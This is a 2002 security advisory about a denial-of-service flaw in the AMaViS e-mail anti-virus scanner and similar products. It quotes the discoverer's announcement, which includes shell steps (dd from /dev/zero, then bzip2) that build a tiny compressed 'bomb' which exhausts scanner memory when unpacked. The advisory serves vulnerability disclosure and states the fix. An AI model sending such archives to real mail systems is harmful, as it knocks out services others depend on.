AMaViS SMTP Anti-Virus Scanner Can Be Crashed By Remote Users Sending Compressed Files With Large Numbers of Null Characters
|
Date: Feb 26 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Description: iNetd Security Research reported a vulnerability in the AMaViS e-mail anti-virus scanner. A remote user can cause the scanner to consume all available memory. Anti-virus products from other vendors are also affected.
It is reported that the scanner does not check the file size inside a compressed file before opening the file for scanning. As a
result, a remote user can send a compressed file that contains a large number of numerical zero characters through the mail gateway
to cause the anti-virus scanner to consume all available memory and potentially crash.
The following demonstration exploit steps
are provided:
root@maciel:/tmp# dd if=/dev/zero of=/tmp/file count=200000
root@maciel:/tmp# ls -l /tmp/file
-rw-r--r-- 1
root root 102400000 Feb 24 22:13 file
root@maciel:/tmp# bzip2 -z file
root@maciel:/tmp# ls -l /tmp/file.bz2
rw-r--r-- 1 root
root 113 Feb 24 22:14 file
In the above example, a small compressed file is created that contains a very large amount of null
characters. When the server attempts to uncompress this file, a denial of service condition is created.
This vulnerability reportedly
also affects other e-mail anti-virus scanner products.
|
Impact: A remote user can cause the e-mail anti-virus scanner to consume available memory and potentially crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.amavis.org/ (Links to External Site)
|
Cause: Resource error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "Eduardo R. Maciel" <maciel@inetd.com.br>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 25 Feb 2002 16:29:02 -0300
From: "Eduardo R. Maciel" <maciel@inetd.com.br>
Subject: Anti Virus Mailscanners DOS
|
-----------------------------------
-----[ SECURITY ANNOUNCEMENT ]-----
-----------------------------------
iNetd Security Research Annoucement
Name: Anti Virus Mailscanners DOS
Systems Affected: System independant
Date: 25/02/2002
Subject: Potential DOS.
Severity: HIGH
Author: Eduardo R. Maciel (maciel@inetd.com.br)
Description
===========
An antivirus mailscanner should check the filesizes inside a compressed file like .tar.gz, .zip, .bz2
, etc, BEFORE open the file for
scanning.
All the products that doesn't do that checking are vulnerable to a Denial Of Service attack.
Pay attention to the procedure below:
root@maciel:/tmp# dd if=/dev/zero of=/tmp/file count=200000
root@maciel:/tmp# ls -l /tmp/file
-rw-r--r-- 1 root root 102400000 Feb 24 22:13 file
root@maciel:/tmp# bzip2 -z file
root@maciel:/tmp# ls -l /tmp/file.bz2
rw-r--r-- 1 root root 113 Feb 24 22:14 file
Since the file has only null (numerical zeros, not the ASCII kind) characters, the size of the compre
ssed file was reduced to a almost
insignificant value.
Sending several mails with these compressed files may let a machine out of memory or disk space.
Solution
========
The mailscanner should check the filesizes inside a compressed file.
Credits:
Eduardo R. Maciel
maciel@inetd.com.br
|
|
